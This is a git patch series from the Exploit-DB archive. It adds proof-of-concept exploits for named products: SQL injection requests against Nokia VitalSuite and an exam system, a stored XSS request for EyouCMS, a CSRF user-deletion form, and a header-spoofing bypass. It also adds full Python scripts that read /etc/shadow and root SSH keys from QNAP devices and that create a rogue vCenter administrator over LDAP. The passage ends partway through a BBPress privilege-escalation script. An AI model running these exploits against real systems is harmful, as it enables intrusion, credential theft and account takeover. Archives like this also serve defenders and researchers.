From a24770728dcdc8828f897efdde542c26e0e65c6b Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Thu, 28 May 2020 12:14:47 +0100 Subject: [PATCH 01/17] Fix for EDBID: 47041 --- searchsploit | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/searchsploit b/searchsploit index 0d3d55d0e..a9ef50a53 100755 --- a/searchsploit +++ b/searchsploit @@ -1,6 +1,6 @@ #!/usr/bin/env bash # Name: SearchSploit - Exploit-DB's CLI search tool -# Version: 4.1.1 (2020-05-01) +# Version: 4.1.2 (2020-05-28) # Written by: Offensive Security, Unix-Ninja, and g0tmi1k # Homepage: https://github.com/offensive-security/exploitdb # Manual: https://www.exploit-db.com/searchsploit @@ -383,7 +383,7 @@ function nmapxml() { ## Read in XMP (IP, name, service and version) xmllint --xpath '//address/@addr|//service/@name|//service/@product|//service/@version' "${FILE}" \ - | sed -e $'s/addr=/\\\n[IP] /g; s/name=/\\\n[NAME] /g; s/product=/\\\n[PRODUCT] /g;s/" version="/\\\n[VERSION] /g; s/"//g' \ + | sed -e $'s/addr=/\\\n[IP] /g; s/name=/\\\n[NAME] /g; s/product=/\\\n[PRODUCT] /g;s/" version="/\\\n[VERSION] /g; s/"//g' \ | grep -v '\[IP\].*\:' \ | while read line; do type=$( echo "${line}" | cut -d" " -f 1 ) @@ -566,7 +566,7 @@ function findresults() { done < <( echo "${TITLE}" \ | grep ${REGEX_GREP} -o "((\d+)(\.?\d*)(\.?\d*)((\.|\-)?(\d|x)*)(\s*))?((<|>)=?)(\s*)(\d+)(\.?\d*)(\.?\d*)((\.|\-)?(\d|x)*)" \ - | sed 's_=__; s_>_<_' + | sed 's_=__; s_>_<_' ) ## Do the same search (just without the version) & loop around all the exploit titles (as thats where the versions are) ## Two main "parts" @@ -597,7 +597,7 @@ function findresults() { fi - ## Magic search Fu + strip double quotes + ## Magic search Fu + strip double quotes + Fix any escaping `\` (need todo it again for JSON only later: issues/#173) OUTPUT="$( ( \ eval ${SEARCH}; \ @@ -607,6 +607,7 @@ function findresults() { | sort -u )" + ## If there are no results, no point going on [[ -z "$OUTPUT" ]] \ && return @@ -616,14 +617,17 @@ function findresults() { ## Web link format ("--json --www")? if [[ "${WEBLINK}" -eq 1 ]]; then OUTPUT="$( echo "${OUTPUT}" \ + | sed 's_\\_\\\\_g' \ | awk -F ',' '{ printf "\\n\\t\\t'{'\"Title\":\"%s\",\"URL\":\"https://www.exploit-db.com/'${url}'/%s\"},", $3, $1 }' )" ## Just the EDB-ID ("--json --id")? elif [[ "${EDBID}" -eq 1 ]]; then OUTPUT="$( echo "${OUTPUT}" \ + | sed 's_\\_\\\\_g' \ | awk -F ',' '{ printf "\\n\\t\\t'{'\"Title\":\"%s\",\"EDB-ID\":\"%s\",\"Path\":\"'${path_in}/'%s\"},", $3, $1, $2 }' )" ## Default JSON ("--json")? else OUTPUT="$( echo "${OUTPUT}" \ + | sed 's_\\_\\\\_g' \ | awk -F ',' '{ printf "\\n\\t\\t'{'\"Title\":\"%s\",\"EDB-ID\":\"%s\",\"Date\":\"%s\",\"Author\":\"%s\",\"Type\":\"%s\",\"Platform\":\"%s\",\"Path\":\"'${path_in}/'%s\"},", $3, $1, $4, $5, $6, $7, $2 }' )" fi OUTPUT="$( echo -e ${OUTPUT} \ @@ -642,7 +646,7 @@ function findresults() { ## Default view else OUTPUT="$( echo "${OUTPUT}" \ - | sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \ + | sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \ | awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \ | sort -f )" fi From 99dc6c7c338e8d1ce29f08b0cd8dcdb783fdb543 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 29 May 2020 05:02:05 +0000 Subject: [PATCH 02/17] DB: 2020-05-29 4 changes to exploits/shellcodes NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection Online-Exam-System 2015 - 'fid' SQL Injection EyouCMS 1.4.6 - Persistent Cross-Site Scripting QNAP QTS and Photo Station 6.0.3 - Remote Command Execution --- exploits/multiple/webapps/48528.txt | 31 +++++++++ exploits/php/webapps/48529.txt | 22 ++++++ exploits/php/webapps/48530.txt | 30 ++++++++ exploits/php/webapps/48531.py | 103 ++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 190 insertions(+) create mode 100644 exploits/multiple/webapps/48528.txt create mode 100644 exploits/php/webapps/48529.txt create mode 100644 exploits/php/webapps/48530.txt create mode 100755 exploits/php/webapps/48531.py diff --git a/exploits/multiple/webapps/48528.txt b/exploits/multiple/webapps/48528.txt new file mode 100644 index 000000000..090d8ca73 --- /dev/null +++ b/exploits/multiple/webapps/48528.txt @@ -0,0 +1,31 @@ +# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection +# Exploit Author: Berk Dusunur +# Google Dork: N/A +# Type: Web App +# Date: 2020-05-28 +# Vendor Homepage: https://www.nokia.com +# Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/ +# Affected Version: v2020 +# Tested on: MacosX +# CVE : N/A + + +# PoC + + +POST /cgi-bin/vsloginadmin.exe HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Accept: / +Accept-Encoding: gzip,deflate +Content-Length: 84 +Host: berklocal +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, +like Gecko) Chrome/41.0.2228.0 Safari/537.21 + +Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1 + +Example Time-Based payload + +UserName=test'; waitfor delay '00:00:10' -- \ No newline at end of file diff --git a/exploits/php/webapps/48529.txt b/exploits/php/webapps/48529.txt new file mode 100644 index 000000000..edc18ebc4 --- /dev/null +++ b/exploits/php/webapps/48529.txt @@ -0,0 +1,22 @@ +# Exploit Title: Online-Exam-System 2015 - 'fid' SQL Injection +# Exploit Author: Berk Dusunur +# Google Dork: N/A +# Type: Web App +# Date: 2020-05-28 +# Vendor Homepage: https://github.com/sunnygkp10/ +# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git +# Affected Version: 2015 +# Tested on: MacosX +# CVE : N/A + +# PoC + +Affected code + +'; +$id=@$_GET['fid']; +$result = mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ") or +die('Error'); + +http://berklocal/dash.php?fid=SQL-INJECTION \ No newline at end of file diff --git a/exploits/php/webapps/48530.txt b/exploits/php/webapps/48530.txt new file mode 100644 index 000000000..7a139b6ae --- /dev/null +++ b/exploits/php/webapps/48530.txt @@ -0,0 +1,30 @@ +# Exploit Title: EyouCMS 1.4.6 - Persistent Cross-Site Scripting +# Date: 2020-05-28 +# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. +# Vendor Homepage: https://eyoucms.com +# Software Link: https://qiniu.eyoucms.com/EyouCMS-V1.4.6-UTF8-SP2.zip +# Version: EyouCMS V1.4.6 +# Tested on: Windows +# CVE : N/A + +Vulnerable Request: +POST /EyouCMS/index.php?m=user&c=UsersRelease&a=article_add HTTP/1.1 +Host: 192.168.31.244 +Content-Length: 131 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.31.244 +Referer: http://192.168.31.244/EyouCMS/index.php?m=user&c=UsersRelease&a=article_add +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: users_id=4; home_lang=cn; admin_lang=cn; PHPSESSID=mahba3d6smn8d400pedi9n9gl0; referurl=http%3A%2F%2F192.168.31.244%2FEyouCMS%2Findex.php +Connection: close + +title=test&typeid=9&tags=&litpic_inpiut=&addonFieldExt%5Bcontent%5D=111&__token__=b90d4bf2356b81f65284238857b91ada + + + +王新峰 技术管理部 +中国银行保险信息技术管理有限公司 \ No newline at end of file diff --git a/exploits/php/webapps/48531.py b/exploits/php/webapps/48531.py new file mode 100755 index 000000000..f1bb85f4b --- /dev/null +++ b/exploits/php/webapps/48531.py @@ -0,0 +1,103 @@ +# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution +# Exploit Author: Yunus YILDIRIM (Th3Gundy) +# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com +# Date: 2020-05-28 +# Vendor Homepage: https://www.qnap.com +# Version: QTS < 4.4.1 | Photo Station < 6.0.3 +# CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195 +# References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit +# References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e +# References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 + +###################################################################### +###################################################################### + +#!/usr/bin/python3 + +__author__ = "Yunus YILDIRIM (@Th3Gundy)" +__version__ = "0.1" + + +import requests +import re, sys + +# hide ssl error +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +def get_banner(): + print("""\033[91m + █████ ███▄ █ ▄▄▄ ██▓███ +▒██▓ ██▒ ██ ▀█ █ ▒████▄ ▓██░ ██▒ +▒██▒ ██░▓██ ▀█ ██▒▒██ ▀█▄ ▓██░ ██▓▒ +░██ █▀ ░▓██▒ ▐▌██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒ +░▒███▒█▄ ▒██░ ▓██░ ▓█ ▓██▒▒██▒ ░ ░ +░░ ▒▒░ ▒ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ + ░ ▒░ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░░▒ ░ + ░ ░ ░ ░ ░ ░ ▒ ░░ + ░ ░ ░ ░ \033[0m \033[94m {0} \033[0m + """.format(__author__)) + + +def get_file_content(file): + post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file} + file_read_response = req.post(url + "/photo/p/api/video.php", data=post_data, headers=headers, verify=False, timeout=10) + + print("="*65) ; print("{0} file content;\n{1}" .format(file,file_read_response.text)) + +# print banner +get_banner() + +if len(sys.argv) != 2: + print("\033[93mUsage : python3 gundy.py https://vulnerable_url:port\033[0m") + sys.exit(-1) + +url = sys.argv[1].rstrip('/') +headers = {"User-Agent": "Gundy - QNAP RCE"} + +# for session cookie +req = requests.Session() + +####################################################################### +# search album_id + +print("="*65) +post_data = {'a': 'setSlideshow', 'f': 'qsamplealbum'} +album_id_response = req.post(url + "/photo/p/api/album.php", data=post_data, headers=headers, verify=False, timeout=10) + +if album_id_response.status_code != 200: + print("album id not found \n\033[91mnot vulnerable\033[0m") + sys.exit(0) + +album_id = re.search('(?<=).*?(?=)', album_id_response.text).group() + +print("album_id ==> " + album_id) + +####################################################################### +# search $_SESSION['access_code'] + +access_code_response = req.get(url + "/photo/slideshow.php?album=" + album_id, headers=headers, verify=False, timeout=10) +if access_code_response.status_code != 200: + print("slideshow not found \n\033[91mnot vulnerable\033[0m") + sys.exit(0) + +access_code = re.search("(?<=encodeURIComponent\\(').*?(?=')", access_code_response.text).group() + +print("access_code ==> " + access_code) + +####################################################################### + +# /etc/passwd file read +get_file_content('./../../../../../etc/passwd') + +# /etc/shadow read +get_file_content('./../../../../../etc/shadow') + +# /etc/hostname read +get_file_content('./../../../../../etc/hostname') + +# /root/.ssh/id_rsa read +get_file_content('./../../../../../root/.ssh/id_rsa') + +####################################################################### \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 98beb6865..2b9530404 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42755,3 +42755,7 @@ id,file,description,date,author,type,platform,port 48525,exploits/php/webapps/48525.txt,"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting",2020-05-27,"Matthew Aberegg",webapps,php, 48526,exploits/php/webapps/48526.txt,"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting",2020-05-27,"China Banking and Insurance Information Technology Management Co.",webapps,php, 48527,exploits/php/webapps/48527.txt,"OXID eShop 6.3.4 - 'sorting' SQL Injection",2020-05-27,VulnSpy,webapps,php, +48528,exploits/multiple/webapps/48528.txt,"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection",2020-05-28,"Berk Dusunur",webapps,multiple, +48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php, +48530,exploits/php/webapps/48530.txt,"EyouCMS 1.4.6 - Persistent Cross-Site Scripting",2020-05-28,"China Banking and Insurance Information Technology Management Co.",webapps,php, +48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, From 326e1cc9df21af6ce7c9a470f6d33fae7e56b0dc Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 30 May 2020 05:01:57 +0000 Subject: [PATCH 03/17] DB: 2020-05-30 2 changes to exploits/shellcodes WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User) Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass --- exploits/multiple/webapps/48533.py | 81 ++++++++++++++++++++++++++++++ exploits/php/webapps/48532.txt | 23 +++++++++ files_exploits.csv | 2 + 3 files changed, 106 insertions(+) create mode 100755 exploits/multiple/webapps/48533.py create mode 100644 exploits/php/webapps/48532.txt diff --git a/exploits/multiple/webapps/48533.py b/exploits/multiple/webapps/48533.py new file mode 100755 index 000000000..acee1f0c8 --- /dev/null +++ b/exploits/multiple/webapps/48533.py @@ -0,0 +1,81 @@ +# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass +# Exploit Author : Halis Duraki (@0xduraki) +# Date : 2020-05-28 +# Product : http-protection (Crystal Shard) +# Product URI : https://github.com/rogeriozambon/http-protection +# Version : http-protection <= 0.2.0 +# CVE : N/A + +## About the product + +This library/shard (http-protection) protects against typical web attacks with-in Crystal applications. It was inspired by rack-protection Ruby gem. It is an open-source product developed by Rogério Zambon in Brazil. The total number of installs and respective usage is not known (no available information), but the Shard get the traction on Crystal official channels (Crystals' ANN, Gitter, and Shardbox). + +## About the exploit + +The `IpSpoofing` middleware detects spoofing attacks (and likewise, should prevent it). Both of this functionalities can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting difference between IP addr values of `X-Forwarded-For` & `X-Real-IP/X-Client-IP`. If the values mismatch, the middleware protects the application by forcing `403 (Forbidden)` response. + +Relevant code (src/http-protection/ip_spoofing.cr): + +``` +module HTTP::Protection +class IpSpoofing +... + +def call(... ctx) +... +ips = headers["X-Forwarded-For"].split(/\s*,\s*/) + +return forbidden(context) if headers.has_key?("X-Client-IP") && !ips.includes?(headers["X-Client-IP"]) +return forbidden(context) if headers.has_key?("X-Real-IP") && !ips.includes?(headers["X-Real-IP"]) +... +end +end +end +``` + +The exploit works by hardcoding the values in all protection request headers following the same const IP Address. The standard format for `X-Forwarded-For` from MDN reference those values as: `X-Forwarded-For: , , `. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls. + +@see CWE-16: https://cwe.mitre.org/data/definitions/16.html + +## PoC (Proof of Concept) + +* Set a breakpoint on the request, or intercept request. +* Hardcore all three request headers: +* X-Forwarded-For: 123.123.123.123 +* X-Client-IP: 123.123.123.123 +* X-Real-IP: 123.123.123.123 +* Continue request. +* Response should be 200 OK, otherwise, 400 Forbidden. + +++ Request example (POC): + +``` +GET / HTTP/1.1 +Host: localhost.:8081 +X-Forwarded-For: 123.123.123.123 +X-Client-IP: 123.123.123.123 +X-Real-IP: 123.123.123.123 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Pragma: no-cache +Cache-Control: no-cache +``` + +++ Response (POC): + +``` +200 OK +```` + +## Fix + +It is advised to fix the IpSpoofing detection via checking socket data directly instead of relying on passed header key/vals. The other solution is to force proxy to dismiss such data (on request) and use original source (proxified). + +============================================================================================================== ++ Halis Duraki | duraki@linuxmail.org | @0xduraki | https://duraki.github.io +============================================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/48532.txt b/exploits/php/webapps/48532.txt new file mode 100644 index 000000000..2bb4035f1 --- /dev/null +++ b/exploits/php/webapps/48532.txt @@ -0,0 +1,23 @@ +# Exploit Title: WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User) +# Google Dork: N/A +# Date: 2020-05-21 +# Exploit Author: UnD3sc0n0c1d0 +# Vendor Homepage: https://www.bdtask.com/ +# Software Link: https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip +# Category: Web Application +# Version: 1.0.0 +# Tested on: CentOS 7 / WordPress 5.4.1 +# CVE : N/A + +# 1. Technical Description: +The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability +in the forms it presents, allowing the possibility of deleting records (users) when an ID is known. + +# 2. Proof of Concept (PoC): + +
+
+ + +
+ \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2b9530404..f0b4b6136 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42759,3 +42759,5 @@ id,file,description,date,author,type,platform,port 48529,exploits/php/webapps/48529.txt,"Online-Exam-System 2015 - 'fid' SQL Injection",2020-05-28,"Berk Dusunur",webapps,php, 48530,exploits/php/webapps/48530.txt,"EyouCMS 1.4.6 - Persistent Cross-Site Scripting",2020-05-28,"China Banking and Insurance Information Technology Management Co.",webapps,php, 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, +48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php, +48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple, From b68cd4f38a9dbf2fb16c4398150a0503521fa697 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 2 Jun 2020 05:01:56 +0000 Subject: [PATCH 04/17] DB: 2020-06-02 3 changes to exploits/shellcodes Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation VMware vCenter Server 6.7 - Authentication Bypass QuickBox Pro 2.1.8 - Authenticated Remote Code Execution --- exploits/multiple/webapps/48535.txt | 248 ++++++++++++++++++++++++++++ exploits/php/webapps/48534.py | 58 +++++++ exploits/php/webapps/48536.py | 53 ++++++ files_exploits.csv | 3 + 4 files changed, 362 insertions(+) create mode 100644 exploits/multiple/webapps/48535.txt create mode 100755 exploits/php/webapps/48534.py create mode 100755 exploits/php/webapps/48536.py diff --git a/exploits/multiple/webapps/48535.txt b/exploits/multiple/webapps/48535.txt new file mode 100644 index 000000000..b15ea1f20 --- /dev/null +++ b/exploits/multiple/webapps/48535.txt @@ -0,0 +1,248 @@ +# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass +# Date: 2020-06-01 +# Exploit Author: Photubias +# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html +# Version: vCenter Server 6.7 before update 3f +# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) +# CVE: CVE-2020-3952 + +#!/usr/bin/env python3 + +''' + Copyright 2020 Photubias(c) + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 + + File name CVE-2020-3592.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x + + This is a native implementation without requirements, written in Python 3. + Works equally well on Windows as Linux (as MacOS, probably ;-) + + Features: exploit + vulnerability checker +''' + +import binascii, socket, sys, string, random + +## Default vars; change at will +_sIP = '192.168.50.35' +_iPORT = 389 +_iTIMEOUT = 5 + +def randomString(iStringLength=8): + #sLetters = string.ascii_lowercase + sLetters = string.ascii_letters + return ''.join(random.choice(sLetters) for i in range(iStringLength)) + +def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified + ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed + sReturn = sPrefix + if (len(sData) / 2 ) > 255: + sReturn += b'82' + hexBytes = 2 + elif (len(sData) /2 ) >= 128: + sReturn += b'81' + sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() + return sReturn + +def buildBindRequestPacket(sUser, sPass): + sUser = binascii.hexlify(sUser.encode()) + sPass = binascii.hexlify(sPass.encode()) + ## Packet Construction + sPacket = getLengthPrefix(sPass, b'80') + sPass + sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket + sPacket = b'020103' + sPacket + sPacket = getLengthPrefix(sPacket, b'60') + sPacket + sPacket = b'020101' + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def buildUserCreatePacket(sUser, sPass): + sUser = binascii.hexlify(sUser.encode()) + sPass = binascii.hexlify(sPass.encode()) + def createAttribute(sName, sValue): + sValue = getLengthPrefix(sValue, b'04') + sValue + sName = getLengthPrefix(sName, b'04') + sName + + sReturn = getLengthPrefix(sValue, b'31') + sValue + sReturn = sName + sReturn + sReturn = getLengthPrefix(sReturn, b'30') + sReturn + return sReturn + + def createObjectClass(): + sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') + sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') + sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') + sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') + + sReturn = getLengthPrefix(sReturn, b'31') + sReturn + sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn + sReturn = getLengthPrefix(sReturn, b'30') + sReturn + return sReturn + + ## Attributes + sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) + sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) + sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) + sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) + sAttributes += createObjectClass() + sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) + ## CN + sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') + sUserEntry = getLengthPrefix(sCN, b'04') + sCN + + ## Packet Assembly (bottom up) + sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes + sPacket = sUserEntry + sPacket + sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def buildModifyUserPacket(sUser): + sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) + sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') + sMember = binascii.hexlify(b'member') + ## Packet Construction + sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN + sPacket = getLengthPrefix(sPacket, b'31') + sPacket + sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket + sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket + sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def performBind(s): + ## Trying to bind, fails, but necessary (even fails when using correct credentials) + dPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') + s.send(dPacket) + sResponse = s.recv(1024) + try: + sResponse = sResponse.split(b'\x04\x00')[0][-1:] + sCode = binascii.hexlify(sResponse).decode() + if sCode == '31': print('[+] Ok, service reachable, continuing') + else: print('[-] Something went wrong') + except: + pass + return sCode + +def performUserAdd(s, sUser, sPass): + dPacket = buildUserCreatePacket(sUser,sPass) + s.send(dPacket) + sResponse = s.recv(1024) + try: + sCode = sResponse.split(b'\x04\x00')[0][-1:] + sMessage = sResponse.split(b'\x04\x00')[1] + if sCode == b'\x00': + print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass) + elif sCode == b'\x32': + print('[-] Error, this host is not vulnerable (insufficientAccessRights)') + else: + if sMessage[2] == b'81': sMessage = sMessage[3:].decode() + else: sMessage = sMessage[2:].decode() + print('[-] Error, user not added, message received: ' + sMessage) + except: + pass + return sCode + + +def performUserMod(s, sUser, verbose = True): + dPacket = buildModifyUserPacket(sUser) + s.send(dPacket) + sResponse = s.recv(1024) + try: + sCode = sResponse.split(b'\x04\x00')[0][-1:] + sMessage = sResponse.split(b'\x04\x00')[1] + if sCode == b'\x00': + if verbose: print('[+] User modification success (if the above is OK).') + else: + if sMessage[2] == b'81': sMessage = sMessage[3:].decode() + else: sMessage = sMessage[2:].decode() + if verbose: print('[-] Error during modification, message received: ' + sMessage) + except: + pass + return sCode, sMessage + +def performUnbind(s): + try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') + except: pass + +def main(): + global _sIP, _iPORT, _iTIMEOUT + _sUSER = 'user_' + randomString(6) + _sPASS = randomString(8) + '_2020' + bAdduser = False + if len(sys.argv) == 1: + print('[!] No arguments found: python3 CVE-2020-3592.py [] []') + print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) + print(' Leave username & password empty for a vulnerability check') + print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') + print(' But for now, I will ask questions') + sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') + if not sAnswer == '': _sIP = sAnswer + sAnswer = input('[?] Want to perform a check only? [Y/n]: ') + if sAnswer.lower() == 'n': bAdduser = True + if bAdduser: + sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') + if not sAnswer == '': _sUSER = sAnswer + sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ') + if not sAnswer == '': _sPASS = sAnswer + else: + _sIP = sys.argv[1] + if len(sys.argv) >= 3: + _sUSER = sys.argv[2] + bAdduser = True + if len(sys.argv) >= 4: _sPASS = sys.argv[3] + + ## MAIN + print('') + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(_iTIMEOUT) + try: + s.connect((_sIP,_iPORT)) + except: + print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') + sys.exit(1) + + performBind(s) + + if bAdduser: + sCode = performUserAdd(s, _sUSER, _sPASS) + + if not bAdduser: + print('[!] Checking vulnerability') + sCode, sMessage = performUserMod(s, 'Administrator', False) + if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) + else: print('[+] This host is vulnerable!') + else: + sCode = performUserMod(s, _sUSER) + + performUnbind(s) + + s.close() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/48534.py b/exploits/php/webapps/48534.py new file mode 100755 index 000000000..c7bf7b794 --- /dev/null +++ b/exploits/php/webapps/48534.py @@ -0,0 +1,58 @@ +# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation +# Date: 2020-05-29 +# Exploit Author: Raphael Karger +# Software Link: https://codex.bbpress.org/releases/ +# Version: BBPress < 2.5 +# CVE: CVE-2020-13693 + +import argparse +import requests +import bs4 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +useragent = {"User-Agent" : "This is a real browser i swear"} + +def grab_nonce_login_page(url): + try: + login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent) + soup = bs4.BeautifulSoup(login_page_request.text, "lxml") + action = soup.find("form", class_="bbp-login-form") + wp_login_page = action.get("action") + wp_nonce = action.find("input", id="_wpnonce").get("value") + return (wp_nonce, wp_login_page) + except Exception as nonce_error: + print("[-] Nonce Error: '{}'".format(nonce_error)) + return False + +def exploit(url, username, password, email): + info = grab_nonce_login_page(url) + if info: + nonce = info[0] + login_page = info[1] + try: + return requests.post(login_page, data={ + "user_login" : username, + "user_pass" : password, + "user_email" : email, + "user-submit" : "", + "user-cookie" : 